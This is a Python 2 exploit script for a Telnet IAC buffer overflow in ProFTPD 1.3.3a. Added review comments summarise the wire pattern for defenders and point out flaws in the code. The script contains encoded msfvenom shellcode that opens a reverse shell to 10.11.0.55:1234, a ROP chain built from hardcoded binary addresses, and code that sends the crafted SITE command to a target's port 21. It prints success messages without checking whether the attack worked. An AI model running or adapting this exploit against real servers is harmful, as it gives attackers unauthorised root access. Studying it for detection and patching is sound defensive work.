#!/usr/bin/python
##
##//#############################################################################################################
## ## #
## Vulnerability: ProFTPD IAC Remote Root Exploit ## Telnet IAC Buffer Overflow (Linux) #
## ## ProFTPD 1.3.2rc3 #
## Vulnerable Application: ProFTPD 1.3.3a ## This is a part of the Metasploit Module, #
## Tested on Linux 2.6.32-5-686 ## exploit/linux/ftp/proftp_telnet_iac #
## ## #
## Author: Muhammad Haidari ## Spawns a reverse shell to 10.11.0.55:1234 #
## Contact: ghmh@outlook.com ## #
## Website: www.github.com/muhammd ## #
## ## #
##//#############################################################################################################
##
##
## TODO: adjust
##
## Usage: python ProFTPD_exploit.py <Remote IP Address>
#
# NOTE(review): Python 2 only. `print` is used as a statement and `str`
# objects are written straight to the socket; under Python 3 the print lines
# are syntax errors and `s.send(buf)` would require bytes.
#
# Defender's summary of what this script emits on the wire: one FTP `SITE`
# command whose argument is the byte string below, followed by a long run of
# 0xff (Telnet IAC) bytes and 0x90 padding, then a fixed set of packed
# addresses. A SITE argument of this length containing a run of 0xff bytes is
# a distinctive pattern for FTP-aware inspection to alert on; the server-side
# mitigation is running a ProFTPD release that is not affected (the header
# names the versions this was written against).
import sys,os,socket
import struct
#msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.11.0.55 LPORT=1234 CMD=/bin/sh PrependChrootBreak=true --smallest -f python -v payload -b '\x09\x0a\x0b\x0c\x0d\x20\xff'
# `payload` is the msfvenom output described by the command above. The
# callback endpoint (10.11.0.55:1234, per the header) is baked into these
# bytes; the script never parameterises it, and `-b` excluded the listed
# byte values (including 0xff) from the encoded output.
payload = ""
payload += "\x6a\x1d\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73"
payload += "\x13\x34\x38\x49\xe4\x83\xeb\xfc\xe2\xf4\x05\xf1"
payload += "\x78\x3f\x5e\x7e\x11\x29\xb4\x52\x74\x6d\xd7\x52"
payload += "\x6e\xbc\xf9\xb8\xc0\x3d\x6c\xf5\xc9\xd5\xf4\x68"
payload += "\x2f\x8c\x1a\x16\xc0\x07\x5e\x05\x10\x54\x38\xf5"
payload += "\xc9\x06\xce\x52\x74\x6d\xed\x60\x84\x64\x05\xe3"
payload += "\xbe\x07\x67\x7b\x1a\x8e\x36\xb1\xa8\x54\x52\xf5"
payload += "\xc9\x77\x6d\x88\x76\x29\xb4\x71\x30\x1d\x5c\x32"
payload += "\x42\xe4\x03\x50\x4b\xe4\x30\xea\xc0\x05\x84\x5e"
payload += "\x19\xb5\x67\x8b\x4a\x6d\xd5\xf5\xc9\xb6\x5c\x56"
payload += "\x66\x97\x5c\x50\x66\xcb\x56\x51\xc0\x07\x66\x6b"
payload += "\xc0\x05\x84\x33\x84\x64"
# NOTE: All addresses are from the proftpd binary
# These constants are tied to one specific build of the target binary (see
# "Tested on" in the header); nothing below computes or verifies them against
# the remote host, so a different build simply gets a malformed command.
IACCount = 4096+16
Offset = 0x102c-4
Ret = "0x805a547" # pop esi / pop ebp / ret
Writable = "0x80e81a0" # .data
# NOTE(review): `Ret` and `Writable` are str literals and are never read
# again; `addrs` below repeats the same two values as packed integers.
# `os` is imported but unused.
if len(sys.argv) < 2:
    print "\nUsage: " + sys.argv[0] + " <HOST>\n"
    sys.exit()
# `rop` is a sequence of packed little-endian 32-bit addresses. Each trailing
# comment is the author's label for the instruction sequence at that address
# in the target binary; the 0xcccccccc entries are filler values per the
# comments.
rop = struct.pack("<L",0xcccccccc) # unused
rop += struct.pack("<L",0x805a544) # mov eax,esi / pop ebx / pop esi / pop ebp / ret
rop += struct.pack("<L",0xcccccccc) # becomes ebx
rop += struct.pack("<L",0xcccccccc) # becomes esi
rop += struct.pack("<L",0xcccccccc) # becomes ebp
# quadruple deref the res pointer :)
rop += struct.pack("<L",0x8068886) # mov eax,[eax] / ret
rop += struct.pack("<L",0x8068886) # mov eax,[eax] / ret
rop += struct.pack("<L",0x8068886) # mov eax,[eax] / ret
rop += struct.pack("<L",0x8068886) # mov eax,[eax] / ret
# skip the pool chunk header
rop += struct.pack("<L",0x805bd8e) # inc eax / adc cl, cl / ret
rop += struct.pack("<L",0x805bd8e) # inc eax / adc cl, cl / ret
rop += struct.pack("<L",0x805bd8e) # inc eax / adc cl, cl / ret
rop += struct.pack("<L",0x805bd8e) # inc eax / adc cl, cl / ret
rop += struct.pack("<L",0x805bd8e) # inc eax / adc cl, cl / ret
rop += struct.pack("<L",0x805bd8e) # inc eax / adc cl, cl / ret
rop += struct.pack("<L",0x805bd8e) # inc eax / adc cl, cl / ret
rop += struct.pack("<L",0x805bd8e) # inc eax / adc cl, cl / ret
rop += struct.pack("<L",0x805bd8e) # inc eax / adc cl, cl / ret
rop += struct.pack("<L",0x805bd8e) # inc eax / adc cl, cl / ret
rop += struct.pack("<L",0x805bd8e) # inc eax / adc cl, cl / ret
rop += struct.pack("<L",0x805bd8e) # inc eax / adc cl, cl / ret
rop += struct.pack("<L",0x805bd8e) # inc eax / adc cl, cl / ret
rop += struct.pack("<L",0x805bd8e) # inc eax / adc cl, cl / ret
rop += struct.pack("<L",0x805bd8e) # inc eax / adc cl, cl / ret
rop += struct.pack("<L",0x805bd8e) # inc eax / adc cl, cl / ret
# execute the data :)
rop += struct.pack("<L",0x0805c26c) # jmp eax
# Build the single FTP command that is sent: "SITE " + payload, one optional
# "B" when the length so far is even (the author calls this alignment), a run
# of 0xff bytes sized so payload+0xff bytes total IACCount, then 0x90 padding
# up to Offset bytes, then the packed addresses, then the CRLF line end.
buf = ''
buf += 'SITE '
buf += payload
if len(buf) % 2 == 0:
    buf += "B"
    print "Buffer was aligned"
buf += "\xff" * (IACCount - len(payload))
buf +="\x90" * (Offset - len(buf))
addrs = struct.pack('<L',0x805a547) #Ret
addrs +=struct.pack('<L',0x80e81a0) #Writable
addrs +=rop
buf += addrs
buf += "\r\n"
# Network I/O. No timeout is set and no exception is handled: a refused or
# unreachable host raises socket.error uncaught. The first recv() reads and
# discards whatever the server sends first (up to 1024 bytes); the command is
# then sent once with no check of the return value.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 21))
s.recv(1024)
s.send(buf)
# These status lines are printed unconditionally; nothing here verifies
# what the server did with the command.
print "Payload Successfully Send...Check your Multi/Handler"
print "....Reverse shell is comming to you..."
# Blocks until the server replies or closes the connection; on a close
# recv() returns '' and an empty line is printed.
data=s.recv(1024)
print data
s.close()